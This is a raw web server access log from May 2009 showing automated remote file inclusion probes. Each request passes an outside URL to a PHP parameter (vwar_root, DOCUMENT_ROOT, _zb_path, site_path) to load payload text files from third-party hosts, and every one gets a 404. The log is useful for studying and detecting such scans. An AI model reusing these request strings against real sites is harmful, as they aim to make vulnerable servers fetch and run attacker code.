203.130.231.111 - - [25/May/2009:04:25:50 -0400] "GET /logs/error_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
203.130.231.111 - - [25/May/2009:04:26:03 -0400] "GET /logs/error_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [25/May/2009:04:26:25 -0400] "GET /logs/access_log.Q109051100%20%20/?_zb_path=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [25/May/2009:04:26:44 -0400] "GET /logs/access_log.Q109050900/?site_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
203.130.231.111 - - [25/May/2009:04:26:47 -0400] "GET /logs/error_log.Q108102500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
203.130.231.111 - - [25/May/2009:04:26:48 -0400] "GET /logs/error_log.Q108100400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:04:26:55 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:04:26:56 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:04:26:56 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.825"
88.84.128.40 - - [25/May/2009:04:27:13 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
